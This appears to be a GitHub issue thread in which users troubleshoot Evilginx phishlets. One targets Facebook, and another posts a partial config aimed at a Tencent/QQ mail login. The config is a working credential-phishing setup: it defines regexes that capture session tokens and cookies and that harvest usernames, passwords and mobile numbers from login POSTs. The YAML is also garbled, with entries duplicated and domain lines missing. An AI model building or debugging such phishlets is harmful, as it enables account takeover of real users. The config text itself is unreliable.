You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
i meet the similar problem, which my phishlet is facebook, evilginx just capture the cookie in the first package, and did not search cookie in the next packages, i mean in the browser f12 i can see the cookie, but in evilginx capture nothing
im currently working on a phishlet and in the phishlet the auth token is like this but still wont capture the cookies
`
auth_tokens:
type: "body"
path: "/cgi-bin/frame_html"
search: '?sid=([^&]*)&sign_type='
name: "sid"
type: "body"
path: "/cgi-bin/frame_html"
search: '?sid=([^&]*)&sign_type='
name: "sid"
type: "body"
path: "/cgi-bin/frame_html"
search: '?sid=([^&]*)&sign_type='
name: "sid"
type: "body"
path: "/cgi-bin/frame_html"
search: '&sign_type=&r=([^"]*)'
name: "r"
type: "body"
path: "/cgi-bin/frame_html"
search: '&sign_type=&r=([^"]*)'
name: "r"
type: "body"
path: "/cgi-bin/frame_html"
search: '&sign_type=&r=([^"]*)'
name: "r"
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
keys: [ '.*,regexp' ]
auth_urls:
credentials:
username:
key: '(inputuin|uin)'
search: '(.@.)'
type: 'post'
password:
key: '(password|ppclone|pwd|pp)'
search: '(.)'
type: 'post'
custom:
- key: "mobile"
search: '(.)'
type: "post"
- key: "uin"
search: '(.*)'
type: "post"`
The text was updated successfully, but these errors were encountered: